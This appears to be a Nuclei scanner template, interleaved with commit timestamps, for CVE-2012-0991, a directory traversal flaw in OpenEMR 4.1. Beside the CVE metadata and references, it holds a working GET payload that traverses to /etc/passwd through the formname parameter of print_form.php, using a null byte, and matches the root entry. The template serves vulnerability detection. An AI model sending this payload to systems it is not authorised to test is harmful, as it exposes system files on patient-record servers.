2021-07-30 23:04:14 +00:00
id : CVE-2012-0991
info :
name : OpenEMR 4.1 - Local File Inclusion
author : daffainfo
severity : high
description : Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
2021-08-19 13:59:12 +00:00
reference :
2021-07-30 23:04:14 +00:00
- https://www.exploit-db.com/exploits/36650
2023-03-02 22:00:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2012-0991
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210121221715/https://www.securityfocus.com/bid/51788/
2022-07-01 10:17:46 +00:00
- http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
2022-02-21 18:33:16 +00:00
classification :
2023-04-28 13:11:35 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-09-06 01:33:31 +00:00
cwe-id : CWE-22
2023-04-28 13:11:35 +00:00
cve-id : CVE-2012-0991
2022-08-27 04:41:18 +00:00
tags : lfi,openemr,traversal,edb,cve,cve2012
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-30 23:04:14 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-30 23:04:14 +00:00
- method : GET
path :
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-30 23:04:14 +00:00
- type : status
status :
- 200